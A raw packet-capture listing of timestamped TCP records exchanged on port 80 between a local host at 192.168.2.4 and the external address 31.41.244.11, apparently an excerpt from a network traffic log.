Nov 5, 2024 18:46:11.269928932 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.270021915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.276242971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276252031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276257992 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276325941 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276335955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276340961 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276346922 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276390076 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.276408911 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.276427031 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276438951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276448965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276458025 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276467085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.276473045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.276508093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.276508093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.277760029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.277770042 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.277780056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.277831078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.277831078 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.277918100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.277962923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278017044 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278037071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278059006 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278076887 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278098106 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278110027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278120995 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278142929 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278150082 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278172970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278188944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278202057 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278207064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278212070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278228045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278259993 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278304100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278314114 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278320074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278348923 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278361082 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278383970 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278394938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278403997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278414011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278429031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278467894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278630018 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278640032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278644085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278650045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278657913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278667927 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278677940 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278681040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278688908 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278698921 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278703928 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278711081 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278714895 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278739929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278743982 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278749943 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278759956 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278769016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278779030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278789997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278800964 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278824091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278840065 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278846979 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278850079 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278870106 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278871059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278884888 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.278886080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278896093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278904915 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.278932095 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279064894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279076099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279087067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279097080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279108047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279117107 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279120922 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279128075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279131889 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279140949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279155970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279161930 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279206038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279231071 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279241085 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279251099 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279262066 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279270887 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279275894 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279299974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279337883 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279407978 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279418945 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279429913 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279453039 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279469013 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279469013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279479980 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279489994 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279515028 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279546022 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279575109 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279582977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279592991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279604912 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279630899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279679060 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279886007 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279895067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279906034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279916048 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279927015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279932976 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279936075 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.279948950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.279989004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288248062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288258076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288269043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288292885 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288337946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288409948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288445950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288472891 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288485050 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288520098 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288538933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288548946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288558960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288578033 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288592100 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288645983 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288655043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288665056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288675070 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288685083 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288695097 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288697004 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288724899 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288754940 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288755894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288764954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288774967 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288785934 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288798094 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288800955 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288810015 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288842916 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288851976 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288866997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288896084 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288934946 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288944960 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288954973 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288966894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.288980961 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.288990974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289004087 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289024115 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289042950 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289217949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289230108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289239883 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289264917 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289303064 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289324999 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289335966 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289391994 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289419889 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289429903 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289443016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289463997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289482117 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289546013 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289556026 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289566040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289575100 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289586067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289593935 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289602995 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289655924 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289659977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289670944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289680958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289690971 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289701939 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289705038 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289731026 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289766073 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289819002 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289829016 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289839029 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289849043 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289859056 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289865017 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289886951 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289954901 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.289972067 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289982080 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.289992094 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290002108 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290015936 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290016890 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290025949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290039062 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290039062 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290049076 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290061951 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290062904 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290071011 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290081978 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290087938 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290095091 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290116072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290133953 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290153027 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290163040 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290210009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290237904 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290247917 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290256977 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290267944 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290280104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290287018 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290299892 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290327072 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290369034 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290379047 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290390015 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290400028 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290411949 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290412903 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290417910 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290446997 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290527105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290538073 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290555954 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290564060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290570974 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290572882 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290582895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290590048 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290612936 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290648937 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290654898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290664911 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290676117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290684938 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290699959 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290699959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290712118 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290725946 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290739059 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290771008 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290843964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290854931 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290863991 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290874958 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290884972 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290894032 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290896893 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290904045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.290920019 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.290939093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320561886 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320574045 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320584059 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320617914 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320632935 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320642948 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320652962 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320653915 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320663929 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320677996 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320718050 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320820093 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320831060 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320841074 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320849895 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320861101 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320868969 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320871115 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320883036 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320892096 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320898056 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320903063 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320904970 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320921898 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.320936918 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320960045 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.320988894 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.321034908 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.321897030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.321907997 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.321918964 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.321933031 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.321949959 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.321964979 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.321974993 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.321985006 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.321995974 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322010040 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322015047 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322057009 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322117090 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322127104 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322137117 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322146893 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322156906 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322168112 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322171926 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322189093 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322211981 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322283030 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322299004 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322309017 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322319984 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322329998 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322331905 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322340965 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322351933 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322355986 CET	49804	80	192.168.2.4	31.41.244.11
Nov 5, 2024 18:46:11.322362900 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322374105 CET	80	49804	31.41.244.11	192.168.2.4
Nov 5, 2024 18:46:11.322376013 CET	49804	80	192.168.2.4	31.41.244.11
